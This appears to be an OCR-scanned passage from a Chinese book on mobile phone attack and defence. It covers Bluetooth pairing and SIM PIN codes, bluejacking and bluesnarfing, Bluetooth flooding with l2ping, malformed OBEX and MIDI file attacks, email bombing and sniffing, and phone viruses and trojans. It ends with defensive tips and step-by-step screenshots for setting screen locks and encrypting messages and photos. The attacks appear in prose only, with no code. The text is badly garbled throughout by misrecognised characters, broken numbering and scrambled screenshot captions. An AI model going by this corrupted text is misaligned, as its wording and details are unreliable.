设备 ， 作 为 从 中 的 蓝牙 耳机 也 可 以 用 起 建 链 请 求 ， 但 进行 数据 通信 的 监 牙 便 块 一 般 不 发 起 
呼叫 。 链 路 建立 成 功 后 ， 主 、 从 两 痪 之 间 即 可 进行 双 同 的 数据 或 语音 通信 。 在 通信 状态 下 ， 
主 端 和 从 病 设 备 痢 可 以 友 起 断 链 ， 断 开 蝗 才 链 路 。 

(3) 蓝牙 一 对 一 的 串口 数据 传输 应 用 

览 牙 数据 传输 应 用 中 , 一 对 一 串口 数据 通信 和 是 最 常见 的 应 用 之 一 。 监 牙 设 备 在 出 
三 醒 即 提前 设 好 两 个 贤 牙 设备 之 间 的 配对 信息 ， 主 并 预存 有 从 问 设 备 的 PIN 人 码 、 地 
址 等 ,两 端 设 备 加 电 即 目 动 建 链 , 透明 串口 传输 , 无 需 外 围 电 路 干预 。 一 对 一 应 用 中 ， 
从 痕 设 备 可 以 设 为 两 种 类 型 。 一 是 前 默 状态 ， 即 只 能 与 指定 的 主 闹 通信 , 不 能 被 别 的 
监 牙 设备 查找 ; 二 是 开 肥 状态 ， 既 可 被 指定 主 中 得 找 ， 也 可 以 被 别 的 蓝牙 设备 碍 找 
建 链 。 
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EE 
> 
关 肛 攻防 从 入 门 到 精通 


PIN 码 


PIN ( Personal Identification Number ) 码 就 是 SIM 卡 的 个 人 识别 密码 。 如 
果 未 经 使 用 者 修改 ， 运 营 商 设置 的 原始 密码 是 1234 或 0000。 如 果 启 用 了 开机 
PIN 码 ， 那 么 每 次 开机 后 就 要 输入 4 位 PIN 码 。PIN 码 是 可 以 修改 的 ， 用 来 保 


护 自 己 的 SIM 卡 不 被 他 人 使 用 。 

需要 注意 的 是 ， 如 果 输 入 三 次 PIN 码 错 误 ， 手 机 便 会 自动 锁 卡 ， 并 提示 输 
入 PUK 码 解 锁 ， 这 时 已 经 接近 危险 的 边缘 ， 如 果 不 知 道 PUK 码 ， 就 暂时 不 要 
动 了 ， 拨 打 客 服 热线 ， 客 服 会 告诉 用 户 初始 的 PUK 码 ， 输 入 PUK 码 之 后 就 会 
解锁 PIN 码 ， 并 可 以 重 置 密码 。 因 此 ， 如 果 用 户 擅 自修 改 了 PIN 码 ， 一 定 要 牢 


Ts 





0.3.2 ” 蓝 动 攻击 与 防范 


早 在 数 年 前 蓝牙 手机 面世 之 时 ， 其 安全 漏洞 就 已 被 提 及 。 有 通信 安全 人 员 就 曾 通 过 一 个 
计算 机 程序 ， 扫 揪 政 牙 手 机 的 传输 波段 ， 并 利用 其 弱点 绕 过 持 有 人 设置 的 密码 ， 以 获取 目标 
电话 通信 禾 里 的 联系 人 信息 和 图 片 信 息 。 但是， 蓝牙 手机 的 安全 漏 润 并 没有 3 引起 手机 生产 三 
商 足 够 的 重视 ， 从 而 导致 其 被 局 科技 “扒手 ”利用 。 一 些 攻 击 者 可 以 未 经 邀请 融通 过 监 牙 与 
手机 连接 ， 发 送 匿名 信息 ; 或 者 远程 拦截 文 持 监 牙 的 手机 ， 这 样 手机 中 的 所 有 资料 束 暴 露 在 
了 攻击 者 和 面前。 在 业内 ， 这 两 种 行为 被 命名 “ 蛤 动 ” 和 “ 抄 裤 攻击”。 

蓝 动 攻击 是 针对 手机 用 户 的 第 见 攻击 方式 ， 因 此 ， 必 须 针 对 蓝 动 攻击 采取 有 效 的 防 
范 措 施 。 

(1) 共用 私 牙 

禁用 蓝牙 是 最 简单 、 最 有 效 的 对 策 。 不 过 ， 这 也 意味 着 用 户 将 无 法 使 用 任何 蓝牙 手机 配 
件 或 设备 。 男 一 个 办 法 是 当 和 需要 使 用 时 开启 昌 牙 ,而 在 人 多 的 地 方 或 收 到 匿名 短信 时 关闭 监 牙 。 

(2) 使 用 不 可 见 /隐藏 模式 

调整 手机 设置 ,将 蓝牙 模式 设置 为 不 可 见 / 隐 藏 模式 ， 这 也 是 更 为 实用 的 方法 。 在 这 种 
模式 下 ， 当 攻击 者 搜索 览 牙 设备 时 ， 用 户 的 手机 不 会 出 现在 攻击 者 的 名 单 中 。 同 时 ， 用 户 
也 可 以 继续 使 用 手机 上 的 蓝牙 功能 与 其 他 设备 相连 接 。 

(3) 不 要 接收 

当 收 到 陌生 人 友 送 的 名 片 时 ， 为 防止 歼 动 ， 选 择 不 接收 短信 和 即 可 。 尤 其 在 拥挤 的 公共 
场所 ， 更 需要 提高 警惕 。 

(4) 更 改 手机 名 称 

如 果 用 户 保 留 手 机 默认 的 名 称 ， 攻 击 者 可 以 很 容易 在 手机 里 找到 详细 的 隐私 信息 。 而 
且 ， 手 机 名 称 让 攻击 者 更 容易 确定 用 户 的 手机 防范 系统 是 人 否 脆弱 。 


6.4 手机 拒绝 服务 攻击 曝光 


拒绝 服务 攻击 即 攻击 者 力 众 法 让 目标 机 痊 停 正 捉 供 服务 ， 十 黑客 种 用 的 攻击 于 段 之 
一 。 攻 击 者 进行 拒绝 服务 攻击 ， 实 际 上 有 两 种 目的 ; 一 是 迫使 服务 器 的 缓冲 区 满 ， 从 而 不 
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能 接收 新 的 请 求 ; 二 是 使 用 IP 欺 骄 ， 迫 使 服务 器 把 合法 用 户 的 连接 复位 ， 从 而 影响 合法 用 
户 的 连接 。 





0.4.{ 弟 见 的 手机 拒绝 服务 攻击 上 曝光 


1. 监 牙 泛 洪 攻击 

赣 牙 泛 洪 攻击 利用 的 是 逻辑 链 路 控制 与 适 配 协议 〈L2CAP)。 该 协议 是 蓝牙 通信 组 的 
一 部 分 ， 传 送 服务 质量 (QS) 信息 和 你 证 任何 两 个 监 牙 功 能 手机 之 则 数据 包 的 正确 传输 。 
换 句 话说 ， 监 牙 的 L2CAP 层 与 TAP/TP 协议 秘 的 ICMP 功能 有 点 相似 。 而 且 ， 该 协议 有 这 
样 的 特点 ， 检 查 和 阻止 任何 在 数据 传输 过 程 中 可 能 出 现 的 错误 。 男 外 ，L2CAP 层 允 许 蓝 牙 
工具 问 男 一 工具 友 出 回 普 的 请 求 ， 以 检查 它 的 存在 。 

蓝牙 工具 能 同时 处 理 的 连接 数量 是 有 限 的 。 一 旦 达到 最 大 值 ， 工 具 就 不 能 建立 其 他 任 
何 新 连接 了 。12ping 工具 要 求 对 每 一 个 发 送 给 远程 鉴 牙 工具 的 回 普 都 建立 一 个 连接 。 这 整 
意味 独 泛 洪 攻 击 通 过 12ping 工具 可 以 使 目标 手机 的 蓝牙 功能 次 痪 。 当 成 功 实施 监 牙 泛 潜 攻 
击 后 ， 目 标 手机 便 会 骨 演 、 终 止 或 者 重启 。 受 害 者 将 不 能 友 现 其 他 的 览 牙 ， 也 不 能 接受 任 
何 连 接 的 要 求 。 

2. BlueJacking 攻击 

BlueJacking 攻击 指 手机 用 户 使 用 蓝牙 技术 匿名 友 送 名 片 的 行为 。 攻击 者 使 用 一 台 或 多 
台 手 持 设 备 对 目标 手机 友 送 大 量 的 匿名 蓝牙 信息 ， 以 扰乱 及 破坏 正常 工作 状态 为 目的 。 

3. 非 正 常 的 OBEX 信息 攻击 

在 这 类 攻击 中 ， 非 正常 的 OBEX 数据 包 被 发 送 到 目标 手机 。 一 旦 易 受 攻击 的 手机 接收 
了 非 正 常数 据 包 ， 束 会 立即 中 断 活 跃 的 操作 和 重启 。 而 所 有 操作 ， 包 括 通 话 、 文 本 信息 、 
游戏 等 就 会 全 部 丢失 。 如 果 铬 干 次 执行 这 样 的 攻击 ， 受 害 者 的 电池 束 会 隧 竭 。 然 而 ， 一 旦 
手机 重新 启动， 所 有 操作 又 会 恢复 。 

4. 非 正 常 的 MIDI 文件 攻击 

一 些 特别 设计 的 MIDI 首 频 文件 被 友 送 到 吻 受 攻击 的 手机 上 ， 一 旦 手机 演示 了 非 正常 
的 MIDI 音频 文件 ， 惑 会 朋 涡 、 终 止 或 重 司 。 



















































































0.4.2 ”于 机 拒绝 服务 攻击 防范 


针对 手机 拒绝 服务 攻击 ， 手 机 用 户 应 该 采取 以 下 一 些 措施 进行 预防 。 
1) 下 载 和 安装 最 新 的 补 ]， 并 将 手机 更 独到 最 新 的 版 本 。 

2) 不 要 接收 阳 生 人 【通过 复 牙 或 红外 线 ) 发 送 的 信息 。 

3) 你 持 手 机 蓝牙 在 隐藏 模式 。 

4) 不 要 与 不明 手机 进行 配对 。 

5) 使 用 较 长 、 难 以 猜 中 的 PIN 码 。 


6.5 手机 电子 邮件 攻击 曝光 
电子 邮件 攻击 ， 是 目前 应 用 较 多 的 一 种 商业 攻击 ， 也 称 为 邮件 炸弹 攻击 ， 就 是 通过 对 




















141 





= 一 > 
新 二 2 攻防 从 入 门 到 精通 


东 个 或 多 个 邮箱 发 送 大 量 的 邮件 ， 使 网 络 流量 加 大 占用 处 理 占 时 间 ， 消 耗 系统 资源 ， 从 而 
使 系统 次 痪 。 目 前 有 许多 邮件 炸弹 软件 ， 昌 然 它 们 的 操作 有 所 不 同 ， 但 是 有 一 个 共同 点 不 
征 它 们 可 以 隐 闫 攻击 者 使 其 不 被 发 现 。 


0.5.{ 认识 邮件 在 网 络 上 的 传播 方式 


电子 邮件 的 标记 为 @， 是 一 种 用 电子 手段 提供 信息 交换 的 通信 和 方式， 是 互联 网 应 用 最 
广 的 服务 。 通 过 网 络 的 电子 邮件 系统 ， 用 户 可 以 以 非常 低 廉 的 价格 、 非 第 快速 的 方式 ， 与 
世界 上 任何 一 个 角落 的 网 络 用 户 联 系 。 

电子 邮件 可 以 是 文字 、 图 像 、 声 音 等 多 种 形式 。 同 时 ,用 户 可 以 得 到 大 量 免费 的 新 闻 、 
专题 邮件 ， 并 实现 轻松 的 信息 搜索 。 电 子 邮 件 的 存在 极 大 地 方便 了 人 与 人 之 间 的 沟通 与 交 
沈 ， 促 进 了 社会 的 发 展 。 


0.5.2 手机 上 常用 的 邮件 系统 


1. 短信 服务 (SMS) 

SMS (Short Messaging Service) 是 最 早 的 短 消 县 业务 ， 也 是 普及 率 最 高 的 一 种 短 消 县 
业务 。 目 前 ， 这 种 短 消 息 的 长 度 被 限定 在 140 字 节 之 内 ， 这 些 字 节 可 以 是 文本 的 。SMS 短 
信和 以 其 简单 、 实 用 的 功能 受到 大 众 的 欢迎 ， 但 是 由 于 属于 第 一 代 的 无 线 数据 服务 ， 在 内 容 
和 应 用 方面 存在 技术 标准 的 限制 。 

2. 通用 分 组 无 线 业务 (GPRS) 

GPRS (General Packet Radio Service， 通 用 分 组 无 线 服 务 技 术 ) 是 GSM 移动 电话 用 户 
可 用 的 一 种 移动 数据 业务 。GPRS 可 以 说 是 GSM 的 延续 。GPRS 和 以 往 连 续 在 频道 传输 的 
方式 不 同 ， 它 是 以 封包 (Packet) 方式 来 传输 ， 因 此 使 用 者 所 负担 的 费用 是 以 其 传输 数据 
单位 计算 ， 并 非 使 用 其 整个 频道 ， 理 论 上 较为 便宜 。 


0.5;3 手机 电子 邮件 攻击 与 防 汇 


1. 间谍 攻击 

由 于 大 多 数 邮 件 都 以 纯 文 本 的 形式 发 送 ， 因 此 ， 这 些 邮 件 极 易 被 抄录 下 来 并 在 Sniffer 
间谍 工具 的 帮助 下 被 侦察 到 。 几 乎 所 有 由 互联 网 服务 商 和 移动 电话 网 络 运 营 丙 提供 的 日 和 党 
邮件 服务 系统 ， 或 是 外 部 未 经 认证 的 网 络 系统 都 要 将 邮件 从 源 服务 器 发 送 到 目标 服务 器 。 
在 邮件 发 送 期 间 ， 攻 击 者 可 采用 多 种 方式 获取 用 户 的 敏感 邮件 信息 。 

男 一 个 与 移动 电话 邮件 用 户 相 关 的 问题 束 是 当 一 个 用 户 被 确认 后 ， 其 用 户 名 和 密码 将 
会 以 纯 文本 的 方式 友 送 至 邮件 服务 占 。 这样 攻 击 者 束 很 容易 通过 Sniffer 间谍 工具 获取 用 户 
的 密码 从 而 进行 一 些 非 法 活动 。 而 如 果 用 户 末 用 默认 选项 保存 密码 ， 攻 击 者 就 十 分 容易 地 
通过 基本 的 密码 破译 工具 盗 取 用 户 的 密码 。 

2. 蠕虫 攻击 

很 多 人 使 用 邮件 客户 问 ， 而 这 正 是 许多 病毒 制造 者 攻击 的 对 象 。 现 在 ， 邮 件 系 统 已 经 
成 为 里 虫 和 病毒 传播 的 主要 途径 。 不 池 的 是 ， 大 量 蜂 忠和 病毒 通过 手机 用 户 使 用 的 邮件 客 
尸 亲 的 着 洞 得 以 大 量 传 播 。 如 果 用 户 使 用 移动 电话 收取 或 发 运 邮 件 ， 将 无 法 抵御 病毒 的 入 
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侵 。 通 利 情 况 下 ， 病 毒 是 可 在 用 户 之 间 传 播 的 恶意 程序 ， 而 旺 虫 日 身 则 可 以 在 有 漏洞 的 移 
动 电话 之 间 目 由 传播 。 

3. 匿名 邮件 攻击 

对 于 攻击 者 来 说 ， 发 送 匿名 邮件 是 件 很 容易 的 事情 。 多 数 心 理 网 络 犯 非 不 是 通过 即时 
信息 就 是 通过 邮件 施行 的 。 因 此 ， 不 论 公司 还 是个 人 ， 在 使 用 邮件 的 时 候 部 应 该 课 剧 。 

4. 防范 措施 

1) 从 网 上 下 载 并 安 闻 过滤 工具 ， 最 大 限度 地 侦 守 并 阻挡 危险 邮件 。 

2) 下 载 补 ]。 大 多 数 的 邮件 后 合 ， 包 括 发 送 邮 件 ， 在 打 补 丁 后 能 够 在 一 定 程 度 上 阻 
接 示 圾 邮件 的 入 侵 。 

3) 保护 个 人 隐私 。 避 人 免 用 日 己 的 邮件 地 址 注册 网 络 比赛 、 苋 完 活 动 等 。 如 果 有 必要 ， 
独创 建 一 个 独立 账户 用 于 这 些 目 的 。 


6.6 手机 病毒 与 木马 攻防 


手机 病毒 是 一 种 具有 传染 性 、 破 坏 性 的 手机 程序 ， 可 用 儿 毒 软件 进行 清除 与 合 杀 ， 了 也 
可 以 手动 到 载 。 其 可 利用 发 送 短信 、 彩 信 、 电 子 邮 件 ， 浏 览 网 站 ， 下 载 铃 声 ， 监 直 等 方式 
进行 传播 ， 会 导 任 用 户 手 机 死机 、 关 机 、 个 人 资料 被 人 删 、 向 外 发 送 垃圾 邮件 泄露 个 人 信息 、 
目 动 拨打 电话 、 友 短 ( 彩 ) 信 等 进行 恶意 扣 费 ， 甚 全 会 损毁 SIM 卡 、 心 片 等 便 件 ， 寻 致使 
用 者 无 法 正 第 使 用 手机 。 

木马 与 一 般 的 病毒 不 同 ， 它 不 会 目 我 毒 殖 ， 也 并 不 “刻意 ”地 去 感染 其 他 文件 ， 它 通 
过 将 目 映 伪 北 吸引 用 尸 下 载 执 行 ， 癌 施 种 木 号 者 提供 打开 被 种 手机 的 门户 ， 使 施 种 者 可 以 
任意 或 坏 、 镭 取 科 施 种 者 的 文件 。 





















































0.0.{ 玫 机 病毒 与 木马 市 来 的 危害 


1. 窃取 个 人 信息 

越 来 越 多 的 手机 用 户 将 个 人 信息 存储 在 手机 上 ， 如 个 人 通讯 录 、 个 人 信息 、 日 程 安排 、 
各 种 网 络 账 号 等 。 这 些 重 要 的 资料 ， 都 是 恶意 程序 的 盘 取 对 象 。 例 如 ， 美 国旅 馆 业 巨头 希 
尔 顿 的 手机 通讯 录 曾 在 莫名其妙 的 状况 下 遭 甸 ， 后 依 专家 研判 指出 ， 有 可 能 是 黑客 通过 鉴 
牙 入 侵 所 致 。 

2. 交易 资料 外 泄 

手机 也 可 以 进行 在 线 交 易 以 及 付 球 ， 所 以 银行 账号 、 密 公 每 也 可 能 会 被 黑客 资 贸 ， 造 
成 用 户 的 经 济 损失 。 

3. 窃取 照片 或 文件 资料 

大 多 数 智 能 手机 都 市 有 照相 以 及 文档 编辑 功能 ， 所 以 用 户 存 储 在 手机 上 的 照片 或 文档 
也 可 能 会 被 黑客 稻 取 。 

4. 窃取 手机 及 SIM 卡 信息 

感染 病毒 的 手机 会 将 上 自身 的 国际 移动 设备 识别 码 〈 手 机 串 号 ) 或 SIM 卡 的 SISM 信息 
反馈 给 手机 病毒 制造 者 ， 从 而 使 被 感染 手机 或 手机 号 人 查 被 利用 ， 可 能 被 利用 来 发 送 广告 短 
信 或 其 他 用 途 。 






























































143 





Py 
全- 攻防 从 入 门 到 精通 
全 人 人 他 


5. 窃取 用 户 通 话 及 短信 内 容 

此 类 手机 病毒 具备 窃听 通话 、 和 轩 取 和 短信、 监听 手机 环境 和 和 定位 地 理 位 置 等 功能 ， 使 得 
被 感染 手机 用 户 的 隐私 泄漏 。 

6. 收发 普 意 信息 

被 病毒 感染 的 手机 可 能 在 用 户 不 知情 的 情况 下 发 送 垃圾 信息 。 虽 然 一 些 垃圾 短信 并 不 
带 有 人 危害 性 ， 但 是 却 耗 费 了 发 信人 的 资 毋 ， 并 且 浪 费 了 收 信人 的 宝贵 时 间 。 而 且 如 果 垃 专 
短信 中 含有 病毒 ， 就 会 导致 收 件 人 也 被 感染 ， 成 为 病毒 和 志 圾 短信 的 帮 罗 或 僵尸 机 器 。 

另外 一 些 被 感染 的 手机 会 将 目 己 的 号 码 或 信息 上 传 到 恶意 地 址 ， 从 而 接收 到 一 些 询 有 
用 心 的 恶意 信息 ， 一 旦 访问 了 信息 中 涉及 的 恶意 网 站 或 下 载运 行 了 其 中 的 文件 ， 便 会 造成 
不 恨 后 果 。 

7. 造成 经 济 损失 

1)〉 通 过 短信 造成 扣 费 : 一 旦 手机 用 户 不 慎 感 染 存 在 屏 菩 业务 短信 行为 的 恶意 软件 ， 
手机 几乎 成 为 “瞎子 ” 任 由 其 通过 后 台 实 施 恶 意 扣 费 等 行为 。 例 如 ， 某 种 恶意 软件 及 其 变 
种 会 在 感染 用 户 手 机 后 ， 会 以 外 发 短信 给 SP 号 码 的 形式 从 中 扣 取 用 户 的 手机 资费 。 

2) 通过 上 自动 拨号 造成 扣 费 : 恶意 软件 植 入 用 户 的 智能 手机 之 后 ， 会 自动 外 拨 电 话 有 至 
指定 的 SP 业务 号 全。 由 于 此 号 段 会 单独 收取 高 额 的 SP 费用 ,一 旦 拨打 此 号 段 写 码 ， 将 对 
用 户 造 成 一 定 的 资费 损失 。 

8. 破坏 手机 软 人 硬件 

1) 手机 死机 : 恶意 病毒 制造 者 可 能 通过 手机 操作 系统 平台 漏洞 攻击 手机 导致 机 顺 
死机 。 

2) 手机 目 动 关机 : 频 党 的 开关 机 ， 可 能 会 造成 手机 零件 或 寿命 的 损害 。 

3) 手机 安全 软件 无 法 使 用 : 手机 病毒 可 能 伪 浅 成 防毒 厂商 的 更 新 包 ， 谓 统 用 户 下 载 
安装 后 使 手机 安全 软件 无 法 正常 使 用 。 

9. 手机 按键 功能 丧失 

例如 ， 手 机 感染 了 SYMBOS LOCKNUT 木马 就 会 导致 手机 按键 功能 丧失 。 

10. 格式 化 手机 内 存 

手机 内 的 存储 卡 ， 也 可 能 面临 被 格式 化 的 风险 。 被 格式 化 后 ， 之 前 存储 的 数据 将 会 全 
部 丢失 ， 给 用 户 市 来 很 大 厂 烦 。 

11. 黑客 取得 手机 系统 权限 

黑客 可 以 在 不 经 使 用 者 同意 的 情况 下 ， 取 得 手机 系统 部 分 权限 甚至 全 部 权限 。 例 如 专攻 
WinCE 手机 的 Brador 后 门 程式 ， 中 毒手 机 会 被 黑客 从 远 闹 下 载 文 件 ， 或 者 执行 特定 指令 。 

12. 破坏 SIM 卡 

早期 黑客 通过 SIM 卡 的 资讯 存 取 长 度 的 漏洞 来 展开 对 SIM 卡 的 直接 破坏 。 


半 潭 [ 




























































































0.0.2 ”于 机 病毒 防范 


1. 手机 厂商 环 市 措施 
手机 病毒 存在 的 一 种 情况 束 是 利用 手机 的 先天 源 洞 ， 所 以 ， 手 机 生产 商 应 该 在 手机 的 
研制 阶段 尽量 地 避免 手机 漏 铜 的 出 现 ， 从 根本 上 杜绝 手机 病毒 。 
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2. 通信 网络 运营 商 环 市 措施 

由 于 手机 的 大 部 分 数据 是 通过 运营 商 的 网 关 进 行 传 大 的 ， 因 此 通信 和 运营 商 在 核心 网 天 
进行 杀毒 和 防毒 可 以 有 效 地 阻止 手机 病毒 的 扩散 。 所 以 ， 通 信 运 营 商 应 该 加 强 网 络 服务 器 
及 网 关上 的 杀毒 软件 和 防火 墙 的 设置 ， 对 过 往 数据 进行 科 选 ， 把 手机 病毒 扼杀 在 “摇篮 ” 
中 。 下 网 是 网 络 通 信和 运营 商 防 范 病 毒 扩 散 的 示意 网 。 


























无 线 接 入 网 络 运营 商 核心 网 电路 域 











分 组 域 


垃圾 邮件 


种 
McAfee Blade Server 蠕虫 


3. 手机 用 户 环 贡 措 施 

1) 使 用 正 厂 手 机 。 正 厂 手 机 的 安全 认证 更 加 严密 。 市 场 中 智能 手机 的 操作 系统 各 
异 ， 防 毒 能 力 不 同 ， 需 要 在 手机 上 安 竣 第 三 方 应 用 软件 时 尽量 去 官方 网 站 下 载 ， 因 为 家 
方 网 站 对 软件 安全 性 的 检查 是 非常 谨慎 的 。 这 样 可 以 大 大 减少 手机 由 于 软件 下 载 造成 的 
中 毒 现 象 。 

2) 安 猴 合适 的 手机 杀毒 软件 。 杀 毒 软件 可 以 实时 监测 手机 用 户 的 数据 流量 ， 及 时 碍 
杀 异 吊 效 据 。 

3) 慎重 对 竺 阳 生 信息 。 当 收 到 阳 生 的 短信 或 彩信 ， 最 好 个 得 看 二 接 删除 ， 避 免 被 不 
法 分 子 植 入 恶意 软件 ， 管 惕 未 知 电话 ， 当 来 电 号 公 显 示 为 乱码 时 ， 尺 量 不 接听 或 者 立即 把 
电话 关闭 ; 不 要 随便 接受 阳 生 瑰 牙 请 求 ， 特 别 是 接收 天 牙 传送 文件 时 要 说 层 对 行 ， 以 免 收 
到 病毒 文件 。 


6.7 手机 加 密 技术 


现在 用 户 手 机 内 的 私人 资料 都 很 多 ， 为 了 帮助 用 户 很 好 地 保护 目 己 手机 中 的 隐私 ， 本 
节 将 详细 介绍 手机 开机 密码 设置 与 解密 、 手 机 短信 与 照片 加 复方 法 。 












































0.7.{ 手机 开机 密码 设置 与 解密 


1. 开机 密码 设置 
为 了 提高 手机 的 安全 性 ， 可 以 为 手机 设置 开机 密码 ， 下 面 分 别 介 绍 安 持 手机 和 苹果 手 
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最 Eg x 本 
关 有 全- 攻防 从 入 门 到 精通 
合 人 人 他 


机 的 开机 密码 设置 方法 。 
安 蛙 手机 的 开机 密码 设置 方法 如 下 。 


STEP01: 打开 “设置 ” STEP02: 进入 “安全 ” 





STEP03: 进入 “SIM 卡 锁 
定 设置 ”窗口 
© di 19:56 





滑动 
拥有 者 信息 
SIM 卡 锁定 


设置 SIM 卡 锁定 


密码 
使 密码 可 见 Ea 
设备 管理 

设备 管理 器 

查看 或 停 用 设备 管理 器 


未 知 来 源 
允许 安装 不 是 从 电子 市 场 获取 的 应 。 | | 
用 程序 


园 应 用 程序 

人 @ 定时 开关 机 
A 

人 入 帐户 与 同步 
僵 位 置 服务 


语言 和 输入 法 
团 重 置 


蟹 黑 名 单 
系统 


凭据 存储 
依 日 期 和 时 间 的 师表 
由 辅助 功能 显示 受信 任 的 CA 证 书 


单 击 “安全 ”选项 。 单 击 “设置 SIM 卡 锁定 ”选项 。 





STEP04: 更 改 SIM 卡 PIN STEP05: 重 尼 手机 


中 作协 A 
输入 PIN 码 (3) 
SIM 卡 被 锁定 


中 基地 9 Ml 齐 19:56 
ph A 
Ko) SIM = tt 由 2 i 


SIM 卡 PIN 


输入 原 PIN 码 (3 次 剩余 ) 








输入 原始 密码 1234， 然 后 可 以 更 ”可 以 看 到 “输入 PIN 码 ”提示 ， 输 
po 入 密码 即 可 。 
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销 定 SIM 卡 Ea 
需要 输入 PIN 才能 使 用 手机 





更 改 SIM 卡 PIN 


勾 选 “锁定 SIM 卡 ” 复 选 框 ， 默 
认 密 码 是 1234， 有 三 次 输入 权 
限 。 还 可 以 更 改 SIM 卡 PIN。 
STEP06: 解锁 SIM 卡 


中 学 志 四 © Md 19:56 
《你 SIM 卡 锁定 设置 


解锁 SIM 卡 


输入 PIN 码 (3 次 剩余 ) 





如 果 需 要 解锁 SIM 卡 ， 单 击 “ 解 
锁 SIM 卡 ， 输 入 密码 即 可 解锁 。 





苹果 手机 的 开机 密码 设置 方法 如 下 。 


STEPOT1: 


进入 主 界面 


手机 银行 
中 国 银行 站 


百度 仙 侠 玄幻 精 选 





单 击 “ 设 置 ”图 标 。 


STEP04: 打开 “密码 锁定 ” 


打开 密码 


更 改 密码 











简单 密码 由 4 个 数字 组 成 。 


GE 


始终 启用 音乐 语音 控制 。 





/ 


语音 拨号 





锁定 时 允许 访问 : 





Passbook 
滑动 “简单 密码 ” 滑 块 ， 激 活该 
选项 。 然 后 单 击 "打开 密码 " 选项。 


首开 “设置 ” 
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四 打 开 “通用 ” 




















单 击 “ 通 用 ”选项 。 


STEP05: 打开 “更 改 饥 码 ” 


输入 设置 的 密码 。 











蜂窝 移动 网 络 打开 > 

VPN 未 连接 > 

iTunes 无 线 局 域 网 同步 > 
| Spotlight 搜索 > 
自动 锁定 1 分 钟 > 


密码 锁定 





访问 限制 





maser 
单 击 “ 密 码 锁定 ”选项 。 


STEP06: 再 次 输入 密码 





设置 成 功 。 
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取 RN 


Ia 
源 2 攻防 从 入 门 到 精通 


全 人 人 他 
STEP0O7: 锁定 屏幕 STEP08: 打开 “输入 密码 ” 


:3 





lll 中 国联 通 仿 13:06 7 34%@P 


输入 密 但 


10 月 1 日 星期 二 






打开 手机 时 出 现 “ 滑 动 来 解锁 " 滑 输入 设 定 的 密码 即 可 进入 手机 界面 。 
块 , 滑动 该 滑 块 。 

2. 手势 密码 设置 

为 手机 设置 开机 密码 后 ， 还 可 以 设置 手势 密码 ， 从 而 添加 一 层 安 全 保障 。 下 面 以 安 早 
系统 为 例 介 绍 手机 手势 密码 设置 。 


STEP01: 打开 “ 设 定 ” ”STEP02: 打开 “位 置 与 安全 ” STEP03: 打开 “设置 屏幕 


IE” 


人 锁定 


CP 浊 4 串 | 加 委 20:36 © 浊 : 4 叫 加 做 20:36 


位 置 币 雪 全 设置 房 荐 议和 
我 的 位 轩 屏幕 解锁 设置 
使 用 GPS 卫星 无 


定位 至 街道 级 (需要 耗费 更 多 电量 ) 取消 屏幕 解锁 安全 设置 
使 用 传 感 路 各 助 图 案 
器 增强 定位 并 省 电 绘制 图 案 以 解锁 屏幕 


设置 屏幕 锁定 输入 PIN 码 以 解锁 屏幕 


用 图 案 、PIN 码 或 密码 锁定 屏幕 
密码 








禁用 USB 调 试 模式 输入 密码 以 解锁 屏幕 


当 屏 幕 锁定 时 USB 调 试 模式 会 被 禁 
用 。 当 设备 加 密 启用 后 这 是 强制 性 的 。 


SIM 卡 锁 


设置 SIM 卡 锁 

辆 应 用 程序 手机 追踪 

有 手机 追踪 

i “位 置 与 安全 ， 选项 。 单 击 “ 设 置 屏 幕 锁 定 ” 选 项 。 单 击 “ 图 案 ” 选 项 。 


$3 位 置 和 安全 
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STEP04: 进入 “和 画 解 锁 图 案 ”STEP05: 画 出 手势 密码 STEP06: 重 画 手势 密码 
涉 加 加 伐 20:36 ?4 叫 加 贫 20:36 


图 案 已 记录 ! 


按 菜单 获得 帮助 





用 户 一 定 要 牢记 解锁 图 案 ， 解 锁 屏幕 上 的 “继续 ”按钮 点 亮 后 ， 单 ” 单 击 “确认 ”按钮 ， 完 成 解锁 图 


图 案 不 能 设置 得 太 简单 的 ， 否 则  ” 击 该 按钮 。 案 设 置 。 
容易 被 破解 。 


STEP07: ”锁定 后 再 次 打开 


可 以 看 到 需要 输入 手势 密码 ， 输 
入 已 设置 的 手势 密码 即 进入 手机 
界面 。 





0.7.2 手机 短信 与 照片 加 密 


1. 手机 短信 加 密 
为 防止 手机 短信 内 容 泄 露 ， 可 对 短信 进行 加 密 ， 下 面 以 360 安全 卫士 为 例 来 介绍 如 何 
对 手机 短信 进行 加 密 。 
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取 RD 


RE] rr 
未 厅 和- 攻防 从 入 门 到 精通 


仿 公 人 志 
STEP01: 打开 360 手机 卫士 STEP02: 进入 “隐私 空间 ” STEP03: 进入 “隐私 短信 ” 









隐私 短信 
保 术 您 的 重要 短信 和 来 
电 






程序 锁 
加 密 保 护 您 的 手机 应 用 从 短信 记录 于 加 


从 通话 记录 线 加 


从 联系 人 汪 力 





| 马上 刊 级 | 


单 击 “ 隐 私 空间 ”选项 。 单 击 “隐私 短信 言 - 选项 。 单 击 “ 添 加 隐私 联系 人 ”"， 骨 选择 
联系 人 添加 方式 。 


STEP04: 添加 通话 记录 STEP05: 确认 导入 内 容 STEP06: 设置 短信 手势 密码 


> 3 
ll 


CTE AT OE: 


[ 





从 通话 记录 添加 


[08j06 19:13] 未 幸 


[08J06 17:58] 来 电 


一 





[08J 量 一 号 由 来 电 汉 

四 

[O08/05 加 

3 时 电 ’ 

bs 本 

色 选 需要 添加 的 联系 人 ,再 单 击 单 击 “确认 ”按钮 ， 即 成 功 导 入 。 当 手 机 来 电 或 者 有 收 到 短信 ， 需 要 
“确定 ”按钮 。 进入 360 的 隐私 空间 进行 查看 时 ， 


需要 输入 设置 的 手势 密码 。 
2. 手机 照片 加 密 
手机 照片 同样 可 以 选择 加 密 ， 下 面 以 手机 管家 为 例 进行 介绍 安里 手机 照片 加 密 方 法 。 
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手机 黑客 攻防 


STEP01: 打开 “手机 管家 ”STEP02: 进入 “隐私 空间 ” STEP03: 设置 图 条 窗 码 


E 川 | 0 8:30 2 Ne 加 Wy 中 E ll 0) 8:32 


手机 管家 ”设置 图 案 密 码 


-EE 
气管 家 ”隐私 空间 


国 口 | 
OD 


安全 等 级 3 
保护 个 人 隐私 ， 
建议 开局 隐私 空间 


较 软件 权限 扫描 
帮 和 您 锁 住 照片 ， 短 信 等 文件 


园 “手机 防 次 避免 难堪 与 误会 





切换 至 “安全 防护 ”选项 卡 , 单 ” 单 击 “ 立 即 开 局 ”按钮 。 设置 手势 密码 。 
击 “ 隐 私 空间 ”选项 。 





